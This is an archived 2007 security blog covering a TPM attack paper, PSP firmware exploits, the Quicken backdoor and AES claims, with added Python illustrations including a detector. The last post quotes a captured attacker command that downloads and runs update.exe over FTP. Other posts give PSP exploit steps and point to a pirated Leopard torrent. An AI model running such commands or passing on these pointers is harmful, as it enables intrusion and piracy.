The Lazy Genius

Security News & Brain Dumps from Xavier Ashe, a Bit9 Client Partner

Archive for June, 2007

Black Hat paper on breaking Trusted Platform Module withdrawn

Posted by Xavier Ashe on June 29, 2007

This is the abstract for a paper that was scheduled to be presented at Black Hat USA 2007 security conference next month. It was removed without explanation from the conference Web site this week, and promised to circumvent security afforded by Trusted Platform Module chips:

“…The attack procedure (TPMkit) involves an attack on the TPM chip.
TPMkit lets you overcome technologies such as Vista's BitLocker. TPMkit
also bypasses remote attestation and thus, will allow to connect over
Trusted Network Connect (TNC) (although the system might not be in
Trusted state).

TPMkit bypasses the security checks mentioned (in the above paragraphs) and thus, you will never know that you are using a
compromised or changed system.

will be demonstrating how to break TPM. The demonstration would include
a few live demonstrations. For example, one demonstration will show how
to login and access data on a Windows Vista System (which has TPM +
BitLocker enabled).

More information on TPMkit (as it evolves) will be released.”

Read the full abstract on NetworkWorld.
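The abstract claims to bypass remote attestation, so it helps to see what a TNC-style verifier actually checks. The following is an added illustration (my own, not code from the withdrawn paper or from any TPM vendor) of the TPM 1.2 PCR extend operation and of a verifier comparing a quoted PCR against a known-good value. The boot-component labels, the nonces and the HMAC that stands in for the TPM's AIK signature are constructed for the example.

```python
import hashlib
import hmac

# Constructed stand-ins for the digests a TPM 1.2 platform extends into a PCR
# during boot (firmware, boot loader, OS loader). Real measurements are hashes
# of the actual code images; short labels keep the example readable.
GOOD_BOOT_CHAIN = [b"firmware v1", b"boot loader v1", b"os loader v1"]
TAMPERED_BOOT_CHAIN = [b"firmware v1", b"boot loader v1", b"os loader patched"]

# Stand-in for the TPM's attestation identity key (AIK). A real TPM signs the
# quote with an RSA key that never leaves the chip; an HMAC key shared with the
# verifier plays that role here so the example needs no crypto library.
AIK_STANDIN = b"constructed-aik-secret"

PCR_RESET = bytes(20)  # a TPM 1.2 PCR is 20 bytes and is all zeros after reset


def extend(pcr: bytes, measurement: bytes) -> bytes:
    """TPM 1.2 PCR extend: PCR_new = SHA-1(PCR_old || SHA-1(measurement)).

    A PCR can only be extended, never written directly, so its final value
    commits to the whole ordered sequence of measurements since reset.
    """
    return hashlib.sha1(pcr + hashlib.sha1(measurement).digest()).digest()


def measure_boot(chain) -> bytes:
    """Extend each boot component into the PCR in order and return the result."""
    pcr = PCR_RESET
    for component in chain:
        pcr = extend(pcr, component)
    return pcr


def tpm_quote(pcr: bytes, nonce: bytes) -> bytes:
    """Platform side: the quote binds the PCR value to the verifier's fresh nonce."""
    return hmac.new(AIK_STANDIN, nonce + pcr, hashlib.sha1).digest()


def verify_attestation(reported_pcr: bytes, signature: bytes, nonce: bytes,
                       golden_pcr: bytes) -> bool:
    """Verifier side (what a TNC-style check relies on):
    1. the quote must verify under the platform's key and *this* nonce,
       so a quote recorded earlier cannot be replayed;
    2. the PCR must equal the known-good value for the expected boot chain.
    """
    if not hmac.compare_digest(tpm_quote(reported_pcr, nonce), signature):
        return False
    return hmac.compare_digest(reported_pcr, golden_pcr)


def attest(chain, nonce: bytes, golden_pcr: bytes) -> bool:
    """Run one attestation round for a platform that booted `chain`."""
    pcr = measure_boot(chain)
    return verify_attestation(pcr, tpm_quote(pcr, nonce), nonce, golden_pcr)


if __name__ == "__main__":
    golden = measure_boot(GOOD_BOOT_CHAIN)
    print("good chain attests:    ", attest(GOOD_BOOT_CHAIN, b"nonce-1", golden))
    print("tampered chain attests:", attest(TAMPERED_BOOT_CHAIN, b"nonce-2", golden))
```

Two properties carry the whole scheme: the extend chain means a changed or reordered component changes the final PCR, and the nonce in the quote means a verifier cannot be satisfied with a quote captured from an earlier, honest boot. Any "bypass" has to defeat one of those two, or the verifier's golden-value list.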


Posted in Security | Leave a Comment »

Lumines sales jump 5900% on Amazon

Posted by Xavier Ashe on June 25, 2007

You may have already heard about the latest PSP exploit discovered within the classic puzzler Lumines,
availing owners of any variety of PSP — all the way up to its current
firmware, 3.50 — the opportunity to run homebrew, install custom
firmware, and generally monkey up Sony's plans to get you to play PSP
games on the system over, say, 14-year-old SNES games. Can't stop 'em,
Sony — this is what people want. People want their hardware unlocked,
they want emulation of everything up to PSX, and they don't want you
steppin' on their toes over it. Proof? Hell, look at Lumines.

a big jump for a launch title. Hey, I'm not saying it wasn't a great
game — it's certainly one of my all-time favorite titles to play on
the toilet, that's for certain — but I can't imagine a nearly 6000%
jump just for nostalgia or 'cos word got out that it wasn't half bad.

It's levelled off a bit since then, but still impressive — the force of a wall of gamers all moving towards emulation and maybe-probably piracy. Well, at least they'll actually play the damn things, now. Go buy Crush, jerks!

From Destructoid.

Posted in PSP Hacks | Leave a Comment »

Surf the Net Safely and Privately with JanusVM

Posted by Xavier Ashe on June 25, 2007

This morning, while having a little fun with VMWare Server, I stumbled on VMWare’s list of free virtualized environments.
If you have any VMWare product installed on your box, you’ll definitely
want to check this list out. Anyhow, like I already said, I stumbled on
this list and quickly browsed the available products. That’s when I
ended up on a very interesting security package named JanusVM.
JanusVM is a virtualized security environment that allows you to surf
the internet absolutely securely and privately. It was designed to run
on VMware Player (or Server) and brings together openVPN, Tor, Squid, Privoxy and dns-proxy-tor to give you a transparent layer of security that is compatible with most TCP based applications.

JanusVM Features:

  • WiFi Support.
  • Supports multiple users in a LAN.
  • Protects you from most man-in-the-middle attacks.
  • Protects you from Javascript, Java, and Flash based side-channel privacy attacks.
  • Protects your identity and your true location by masking your IP Address.
  • Encrypts and re-routes your DNS request and ALL TCP traffic to ensure strong privacy.
  • Strips out most privacy sensitive information your web browser may leak.
  • Blocks popups, annoying ads, banners, and other obnoxious Internet junk.
  • Very simple setup and operation.
  • Works transparently for applications using TCP.

Setup is very easy. Just download and install VMWare player, download JanusVM and follow these simple instructions.

After setting up the environment, if you decide to keep JanusVM running on your box, please consider giving a small donation to the developer. Your donations will surely encourage him to keep on working on this fantastic project.

Nice, I'm downloading this now.  Usually the presence of Tor on a corporate laptop is eyed suspiciously.  Found on Geeks are Sexy.

Posted in Privacy | Leave a Comment »

Quicken Backdoor Could Give Feds Access to Finance Data

Posted by Xavier Ashe on June 25, 2007

A Moscow-based
password-recovery vendor Thursday accused Intuit Inc. of hiding a
backdoor in its popular Quicken personal finance program that gives it
— and perhaps government agencies — access to users’ data files.

called the charges baseless, and said that although there is a way to
unlock Quicken’s encrypted data, it’s only used by the company’s
support team to help customers who have forgotten their passwords.

a statement, Elcomsoft Co. Ltd., a Russian maker of password-recovery
tools, said Quicken versions since 2003 have used strong encryption
designed to foil hackers. But those editions also have a backdoor that
unlocks the encryption with the 512-bit RSA key that Intuit controls.

is very unlikely that a casual hacker could have broken into Quicken’s
password protection regimen,” Vladimir Katalov, Elcomsoft’s CEO, said
in the statement. “[We] needed to use advanced decryption technology to
uncover Intuit’s undocumented and well-hidden backdoor, and to
successfully perform a factorization of their 512-bit RSA key.”

“Very unlikely…” my ass.  Read the full article at
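What makes a vendor-held recovery key dangerous is not the per-file encryption but the escrow structure around it: every file's data key is wrapped under one RSA public key, so whoever factors that one modulus holds the master key for all of them. The following is an added toy illustration (my own, not Quicken's format, cipher or key, and not Elcomsoft's tooling) of that structure with a modulus small enough to factor in a second; the primes, the stream cipher and the sample ledger text are constructed for the example.

```python
import hashlib
import math
import secrets

# Constructed toy vendor key: the 100,000th and 1,000,000th primes (about 21
# and 24 bits) instead of a 512-bit modulus, so the whole escrow-and-recovery
# cycle runs instantly. The structure is identical at any key size; only the
# factoring effort changes.
VENDOR_P, VENDOR_Q = 1299709, 15485863
VENDOR_N = VENDOR_P * VENDOR_Q
VENDOR_E = 65537


def keystream(key_int: int, length: int) -> bytes:
    """Keystream derived from the per-file data key (SHA-256 in counter mode).
    Constructed for the example; not Quicken's cipher."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        block = key_int.to_bytes(8, "big") + counter.to_bytes(4, "big")
        out += hashlib.sha256(block).digest()
        counter += 1
    return bytes(out[:length])


def xor_crypt(data: bytes, key_int: int) -> bytes:
    """Encrypt or decrypt (XOR is its own inverse) under the data key."""
    return bytes(a ^ b for a, b in zip(data, keystream(key_int, len(data))))


def escrow_wrap(key_int: int) -> int:
    """What a vendor recovery backdoor stores beside the file: the data key
    encrypted to the vendor's RSA public key (textbook RSA, toy size)."""
    return pow(key_int, VENDOR_E, VENDOR_N)


def pollard_rho(n: int) -> int:
    """Return a nontrivial factor of n (Pollard's rho with Floyd cycle finding).
    Practical only for small moduli such as the toy one above."""
    if n % 2 == 0:
        return 2
    for c in range(1, 100):
        x = y = 2
        d = 1
        while d == 1:
            x = (x * x + c) % n
            y = (y * y + c) % n
            y = (y * y + c) % n
            d = math.gcd(abs(x - y), n)
        if d != n:
            return d
    raise ValueError("no factor found")


def private_exponent_from_modulus(n: int, e: int) -> int:
    """Once n is factored, the private exponent follows directly."""
    p = pollard_rho(n)
    q = n // p
    return pow(e, -1, (p - 1) * (q - 1))


def escrow_unwrap(wrapped: int, d: int) -> int:
    return pow(wrapped, d, VENDOR_N)


def escrow_recovery_demo(plaintext: bytes = b"constructed ledger: balance 1234.56") -> bool:
    """One file's life cycle, then recovery by a party who never had the key."""
    # User side: fresh per-file key, file encrypted, key escrowed to the vendor.
    data_key = secrets.randbelow(VENDOR_N - 2) + 2
    ciphertext = xor_crypt(plaintext, data_key)
    wrapped_key = escrow_wrap(data_key)

    # Anyone who factors the vendor modulus once holds the private exponent
    # for every escrowed key ever produced, not just this file's.
    d = private_exponent_from_modulus(VENDOR_N, VENDOR_E)
    recovered_key = escrow_unwrap(wrapped_key, d)
    return xor_crypt(ciphertext, recovered_key) == plaintext


if __name__ == "__main__":
    print("recovered without the user's password:", escrow_recovery_demo())
```

The lesson for anyone designing recovery features is that the data key's strength is irrelevant once it is wrapped under a weaker, shared, long-lived key; the escrow key has to be at least as strong as the data it protects, and a 512-bit RSA modulus was already within reach of a determined group in 2007.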

Posted in Privacy, Security | Leave a Comment »

Run Homebrew on your PSP v3.50!!

Posted by Xavier Ashe on June 25, 2007

Following research in conjunction with Archaemic, Noobz are proud to
present the first ever all-firmware exploit for the PSP.  Based on
Lumines, the “Illuminati” exploit is a user-mode exploit using a buffer
overflow in the savedata file – similar to the GTA exploit.

That's right – if you've got a legal UMD
copy of Lumines, then you can run homebrew on your PSP – whatever the
firmware version.  That includes v3.50! Right now, the only homebrew is
the Hello World demo released below – but in future we intend to
release a HEN and downgrader.

To make the exploit work:

  • Check that you have an EU or
    US version of Lumines (ULES00043 or ULUS10002).  Currently we don't
    have a version for the Japanese version, but we're working on it, as
    soon as we get hold of a Japanese UMD. 
  • Extract the contents of the 'MS_ROOT' folder from the ZIP file into the top-level of your memory stick. (HINT: If you wind up with an 'MS_ROOT' folder on the stick, you've done it wrong).
  • Start
    the game, and as soon as it gets to the 'Press START' screen, press
    START.  If you wait until the demo has started, the exploit may not
  • The screen should go blank, and the exploit will start
    after a few moments.  It doesn't do anything except look pretty at this
    stage – but feel free to enjoy the first homebrew on your v3.10 – v3.50
    PSP

 Download Illuminati exploit

File Size: 132.65 Kb
Downloads: 8501

From noobz.

Posted in PSP Hacks | Leave a Comment »

The Leopard has been let loose

Posted by Xavier Ashe on June 22, 2007

Arrrrrr. Avast Ye Matey! The cat is out of the bag. The WWDC 2007
beta of Leopard (Build 9A466) has hit the grand daddy of all torrent
sites. Just search for “The Big Cat” on The Pirate Bay and fire up your
favorite BitTorrent client.

For those of you who don’t want to cross over to the shady side of computing you can check out ThinkSecrets gallery.

From UNEASYsilence.

Posted in Security | Leave a Comment »

AES seems weak

Posted by Xavier Ashe on June 22, 2007

We describe a new simple but more powerful form of linear cryptanalysis. It appears to break AES (and undoubtedly other cryptosystems too, e.g. SKIPJACK). The break is “nonconstructive,” i.e. we make it plausible (e.g. prove it in certain approximate probabilistic models) that a small algorithm for quickly determining AES-256 keys from plaintext-ciphertext pairs exists – but without constructing the algorithm. The attack’s runtime is comparable to performing 64^w encryptions where w is the (unknown) minimum Hamming weight in certain binary linear error-correcting codes (BLECCs) associated with AES-256. If w < 43 then our attack is faster than exhaustive key search; probably w < 10. (Also there should be ciphertext-only attacks if the plaintext is natural English.)

Even if this break breaks due to the underlying models inadequately approximating the real world, we explain how AES still could contain “trapdoors” which would make cryptanalysis unexpectedly easy for anybody who knew the trapdoor. If AES’s designers had inserted such a trap door, it could be very easy for them to convince us of that.  But if none exist, then it is probably infeasibly difficult for them to convince us of that.

We then discuss how to use the theory of BLECCs to build cryptosystems provably
1. not containing trapdoors of this sort,
2. secure against our strengthened form of linear cryptanalysis,
3. secure against “differential” cryptanalysis,
4. secure against D.J.Bernstein’s timing attack.

Using this technique we prove a fundamental theorem: it is possible to thus-encrypt n bits with security 2^cn , via a circuit Qn containing < cn two-input logic gates and operating in < c log n gate-delays, where the three cs denote (possibly different) positive constants and Qn is constructible in polynomial(n) time. At the end we give tables of useful binary codes.

Interesting paper from Warren D. Smith (pdf).
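The abstract's whole cost claim hinges on one number, the minimum Hamming weight w of a binary linear code, and on the comparison of 64^w against exhaustive search over 2^256 keys. The following added example (mine, not code from Smith's paper) computes the minimum weight of a small linear code by brute force and works out where the abstract's w < 43 threshold comes from. The [7,4] Hamming and [4,3] parity codes are stand-ins; the codes the paper associates with AES-256 are not reproduced on the page.

```python
from itertools import product

# Systematic generator matrix of the [7,4] Hamming code. Every codeword is a
# GF(2) sum of rows; the code has 2^4 = 16 codewords and minimum distance 3.
HAMMING_7_4 = [
    [1, 0, 0, 0, 1, 1, 0],
    [0, 1, 0, 0, 1, 0, 1],
    [0, 0, 1, 0, 0, 1, 1],
    [0, 0, 0, 1, 1, 1, 1],
]

# [4,3] even-parity code: every codeword has an even number of ones, so the
# minimum weight is 2.
PARITY_4_3 = [
    [1, 0, 0, 1],
    [0, 1, 0, 1],
    [0, 0, 1, 1],
]


def encode(generator, message):
    """Multiply a k-bit message by the k x n generator matrix over GF(2)."""
    codeword = [0] * len(generator[0])
    for bit, row in zip(message, generator):
        if bit:
            codeword = [c ^ r for c, r in zip(codeword, row)]
    return codeword


def codewords(generator):
    """All 2^k codewords of the code spanned by the generator's rows."""
    k = len(generator)
    return [encode(generator, m) for m in product((0, 1), repeat=k)]


def minimum_weight(generator):
    """Smallest Hamming weight among the nonzero codewords. For a linear code
    this equals the minimum distance. Brute force over 2^k messages, which is
    fine for toy codes and hopeless at the sizes the paper tabulates."""
    return min(sum(cw) for cw in codewords(generator) if any(cw))


def attack_cost_log2(w):
    """log2 of the abstract's claimed work: 64^w encryptions = 2^(6w)."""
    return 6 * w


def faster_than_exhaustive_search(w, key_bits=256):
    """True when 64^w encryptions cost less than trying all 2^key_bits keys."""
    return attack_cost_log2(w) < key_bits


def threshold_weight(key_bits=256):
    """Smallest w at which the claimed attack is no longer cheaper than
    exhaustive search; for AES-256 this reproduces the abstract's 'w < 43'."""
    w = 0
    while faster_than_exhaustive_search(w, key_bits):
        w += 1
    return w


if __name__ == "__main__":
    print("Hamming [7,4] minimum weight:", minimum_weight(HAMMING_7_4))
    print("parity [4,3] minimum weight: ", minimum_weight(PARITY_4_3))
    print("AES-256 threshold w:", threshold_weight(256))
    print("cost at w = 10: 2^%d encryptions" % attack_cost_log2(10))
```

Since 64^w = 2^(6w), the attack beats a 2^256 search exactly when 6w < 256, i.e. w <= 42, which is the "w < 43" in the abstract; at the guessed w < 10 the work would be under 2^60. The hard part, and the part the abstract leaves open, is establishing the true minimum weight of the AES-256 codes, which the brute-force routine above cannot do at realistic sizes.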

Posted in Security | Leave a Comment »

PSP firmware 3.03 downgrader

Posted by Xavier Ashe on June 19, 2007

Fanjita may have told you guys what to do with a non-homebrew capable PSP, but now it appears that everyone can get in on the homebrew fun! The “goofy exploit”
which exists in firmwares 2.00 to 3.03 was found on Friday, January 25,
2007, a date which you'd think might go down in the PSP homebrew
history. But it probably won't because despite their seven-day ETA, the
Noobz team has once again fortified its position at the top of the homebrew coding ladder with a 3.03 downgrader – just three days after the exploit was found!

Some call it magic, others call it an act of god, but whatever the reason for it, PSP gamers all across the world can now downgrade their consoles to the magic of homebrew-capable 1.5, and then, if they wish to do so, upgrade to homebrew-capable custom firmware. All you need is a PSP running firmware 3.03 (if not, then update to 3.03 using the update EBOOT found here), the downgrader files and the 1.50 EBOOT, as well as an unpatched version of Grand Theft Auto: Liberty City Stories.

Unpatched versions of Liberty City Stories contain the 2.0 update, whereas patched versions contain higher updates. If your copy of LCS
has an update higher than 2.0 on it, then you will have to find an
unpatched UMD to proceed. There's no need to worry if you have a TA-082
PSP as the downgrader will check your motherboard and patch it if necessary. Note the downgrader will not let you proceed without patching if your motherboard requires it.

only has Noobz released a 3.03 downgrader but they've also managed to
release a 3.03 HEN (Homebrew Enabler) for the PSP. This means that
those of you who aren't too sure that you want to downgrade can still
play homebrew on 3.03. This does not flash your PSP, but by running
HEN, it installs a patch in your PSP's memory, that allows you to run
homebrew almost as if you had a v1.5 PSP. This patch remains in place
until you fully turn off your PSP – it will survive the PSP being
placed into sleep mode. You run the HEN application just as you do the
downgrader using Grand Theft Auto: Liberty City Stories.

use this simply download the 3.03 HEN files from the download links
below and copy them to your PSP. Then run your unpatched version of
GTA:LCS and the patch will apply itself. It will be stored in RAM and
will stay there until you reset your PSP. Putting the PSP in sleep mode
will not remove the patch. This is based on the source for HEN 2.71
provided by Dark_Alex, so the Noobz team would like to thank him for
the code and the help. Additional credits go to Booster, Team C + D for
the registry kernel exploit and Mathieulh for the help provided to

PLEASE READ: This downgrader has been tested by the highly-successful Noobz team and has been proven to work, however there is a small chance that bricking could occur during the process of downgrading.
QJ.Net and the Noobz team are not responsible for any damage which may
happen to your PSP by this application. Can you also note before use
that it is possible to brick using this downgrader if you downgrade and
then update to 3.03 and then downgrade again. The advice from Fanjita
right now is to only use this once. If you update to 3.03 again after
using the downgrader then we suggest you leave it there to prevent your
PSP from bricking.

Now we've got the boring bit over with, we
can move onto the downgrade process itself. Here's QJ's “how to” for
downgrading from 3.03 to 1.50:

1. Update to firmware 3.03. If already have this firmware then proceed to step 2.

2. Open the 3.03 downgrade file and copy the contents of the folder MS_ROOT to the root of your memory stick.

3. Open the 1.5 update and rename the EBOOT.PBP to UPDATE.PBP then copy it to /PSP/GAME/UPDATE/
Make sure not to overwrite PSP/GAME/UPDATE/EBOOT.PBP

4. Load Grand Theft Auto: Liberty City Stories (unpatched)

5. It should get to loading save game, clear the screen, the screen should fill with a light blue color and then reset the PSP. (If this does not happen see below)

6. Check that HEN is running by going to system settings then System Information and it should show up as system version 303 HEN

7. If it is showing up as 3.03 HEN then go to the memory stick and run the x.yz update

8. Before the downgrader does anything to your PSP it will ask for you to agree to what it is doing.  If you no longer want to continue press the Right Shoulder Button (R-TRIGGER).

9. Once you have agreed to start the downgrade do not unplug the PSP

10. Once finished the PSP will ask you to press X, after pressing it will reset it self.

11. If it comes up saying that the settings are corrupt press X to continue.

12. Enjoy your new shiny 1.5 PSP.

What do you do once you have firmware 1.5? Well, you can either start downloading homebrew games from our QuickJump Downloads site and use DevHook to run your current homebrew games, or use the more popular option, which is to upgrade to Dark_Alex's 3.03 OE-C Custom firmware. The friendly people over at our forums have even created an easy-to-follow installation guide for 3.03 OE-C
if you've never used custom firmware before. This will give you all the
features of 3.03 and the ability to play homebrew and PSX games too! It
doesn't get much better than this. [Updated Video of the downgrade process after the jump, thanks to demologik]

Download: [Noobz 3.03 Homebrew Enabler (HEN)]
Download: [Noobz 3.03 to 1.50 downgrader]
Download: [1.50 Update]
Discuss: [Official Downgrader Forums]
Read: [Official Downgrader FAQ]

Posted in PSP Hacks | Leave a Comment »

Microsoft Unwraps Security Platform

Posted by Xavier Ashe on June 6, 2007

Now that Microsoft's revealed its plans for a next-generation integrated security management platform, the heat is on. (See Microsoft Adds Next-Gen Forefront Roadmap.)

By developing a single, unified management platform — code-named
“Stirling” — for security from the server to the endpoint and the
edge, Microsoft has made what may be its most aggressive security play
yet, security experts say of the software giant's announcement at its
TechEd 2007 conference yesterday.

Stirling initially will work only with Microsoft's Forefront
products, but it eventually will expand to include the integration and
interoperability with third-party security vendors' products, says Paul
Bryan, a director of security and access product management for

By unifying its security tools with Stirling, Microsoft is
“channeling” IBM, says Enderle Group's Rob Enderle. “IBM traditionally
owned security for their offerings and they could integrate that
security solution into the other solutions they had to ensure SLAs were
maintained and disruption was minimized,” he says. “Microsoft is now
showcasing a similar strength, by approaching the problems
comprehensively and pushing for their integration into Microsoft's
overall ecosystem.”

The question is whether enterprises will follow the IBM old adage
with “no one ever got fired for buying” Microsoft. “The 'play it safe'
from an employment perspective buyer will now bounce between Microsoft,
CA, Symantec, McAfee, and Trend Micro,” says Randy Abrams, director of
technical education for Eset, and the former operations manager for
Microsoft's Global Infrastructure Alliance for Internet Safety. “All of
these players have enterprise management tools and enough name
recognition to qualify for safe purchasing under the 'buy IBM'

Read more on Dark Reading.

Posted in Security | Leave a Comment »

IBM Snaps up Watchfire

Posted by Xavier Ashe on June 6, 2007

IBM liked Watchfire's Web application security software so much it plans to buy the company for an undisclosed sum, it said

Watchfire develops software for identifying vulnerabilities in Web applications and for auditing sites for compliance with
regulations on corporate governance, data privacy, or accessibility.

IBM plans to fold the Waltham, Massachusetts, company into its Rational division, adding Watchfire's security compliance and
quality testing functions to Rational's software delivery tools.

two companies are no strangers: Watchfire's 800 customers include IBM,
Dell, Sun Microsystems, and a host of others in the financial,
pharmaceutical and entertainment industries. IBM's Global Services
division is also a partner and reseller, according to Watchfire.

developers of application security testing tools include Cenzic and SPI
Dynamics. Cenzic, in Santa Clara, California, has worked with
application development tool specialist Borland Software in the past,
and its current partners include IBM and Mercury Interactive, now a
subsidiary of Hewlett-Packard.

Watchfire developed its WebXM auditing tool in house, but obtained its flagship AppScan product through the acquisition of Sanctum in July 2004.

IBM expects to close the deal in the third quarter, subject to regulatory approval.

From Infoworld.  It makes sense that this goes to Rational, but I would have liked for it to be in Tivoli just so I could have more toys to play with.  I sold Watchfire when I was an independent consultant.  I also was in the process of setting up a company I was working for as a partner for Watchfire.  So I really like their technology.  It's integrating security into your full life cycle development.  Very useful technology.

Posted in Security | Leave a Comment »

Anyone seen this?

Posted by Xavier Ashe on June 5, 2007

I've got a bastion host that had vnc wide open.  I just got a connection.  It fired a ctrl-alt-del, opened a task manager, and ran cmd.exe.  It then executed the following command.  I was able to get a screen shot before the window disappeared, but it looked like the command was not successful.  The attacker disconnected immediately.  I have no extra users, but am downloading Helix right now to see if anything really happened.  I also have a pcap.  But does this look familiar to anyone?

cmd /c net set 21 >> ij &echo user ingenieurisiv aiisiv >> ij &echo binary >> ij &echo get update.exe >> ij &echo bye >> ij &ftp -n -v -s:ij &del ij &update.exe &net start SharedAccess &exit
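The shape of that command line is the tell rather than any one token: a download script is assembled with a chain of `echo ... >> file`, handed to `ftp -n -s:file`, deleted, and the fetched binary is run in the same breath. As an added example (mine, not something from the post or from any product), here is a small detector for that pattern, run over process command lines; the first sample is the command captured above, reproduced as-is, and the benign lines are constructed for contrast. Field names and the severity scale are my own choices.

```python
import re

# Constructed process-creation records. The first command line is the one
# captured in the post, reproduced as-is; the other three are benign lines
# constructed for contrast.
SAMPLE_COMMAND_LINES = [
    "cmd /c net set 21 >> ij &echo user ingenieurisiv aiisiv >> ij &echo binary >> ij "
    "&echo get update.exe >> ij &echo bye >> ij &ftp -n -v -s:ij &del ij &update.exe "
    "&net start SharedAccess &exit",
    "cmd /c dir C:\\Users",
    "cmd /c echo build ok >> build.log",
    "ftp -s:deploy.txt fileserver.internal",
]

# ftp invoked with a script file (-s:FILE) somewhere in this command segment.
FTP_SCRIPT = re.compile(r"\bftp\b[^&|]*?-s:(?P<script>[^\s&]+)", re.IGNORECASE)
# echo TEXT >> FILE, the building block of a script assembled on the fly.
ECHO_APPEND = re.compile(r"\becho\s+(?P<text>[^&>]*?)\s*>>\s*(?P<file>[^\s&]+)", re.IGNORECASE)


def analyze_command_line(cmdline: str):
    """Return a finding dict for an echo-built FTP download script, else None."""
    ftp = FTP_SCRIPT.search(cmdline)
    if not ftp:
        return None
    script = ftp.group("script")

    # Only echoes into the very file ftp then reads count: an ftp script that
    # already existed on disk (e.g. a deployment job) is a different story.
    script_lines = [m.group("text").strip() for m in ECHO_APPEND.finditer(cmdline)
                    if m.group("file").lower() == script.lower()]
    if not script_lines:
        return None

    # Files the script downloads ("get NAME"), and which of them the same
    # command line goes on to execute as a bare command.
    fetched = [parts[1] for line in script_lines
               if (parts := line.split()) and len(parts) >= 2 and parts[0].lower() == "get"]
    executed = [f for f in fetched
                if re.search(r"(?:^|&)\s*" + re.escape(f) + r"(?=\s|&|$)", cmdline, re.IGNORECASE)]

    return {
        "script_file": script,
        "script_lines": script_lines,
        "fetched": fetched,
        "executed": executed,
        "deletes_script": bool(re.search(r"\bdel\s+" + re.escape(script) + r"(?=\s|&|$)",
                                         cmdline, re.IGNORECASE)),
        "non_interactive": bool(re.search(r"\bftp\b[^&|]*\s-n\b", cmdline, re.IGNORECASE)),
        "severity": "high" if executed else "medium",
    }


def scan(command_lines):
    """Run the detector over a batch of command lines; returns (index, finding)."""
    return [(i, f) for i, line in enumerate(command_lines) if (f := analyze_command_line(line))]


if __name__ == "__main__":
    for i, finding in scan(SAMPLE_COMMAND_LINES):
        print(i, finding["severity"], finding)
```

On a real host this would sit on process-creation events (Sysinternals or EDR command-line logging) and the interesting correlations are the ones the post already has: the parent being a VNC or remote-desktop session, the `SharedAccess` service being started right after, and whether `update.exe` ever appeared on disk, which the Helix image and the pcap can answer.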

Posted in Main Page, Security | Leave a Comment »
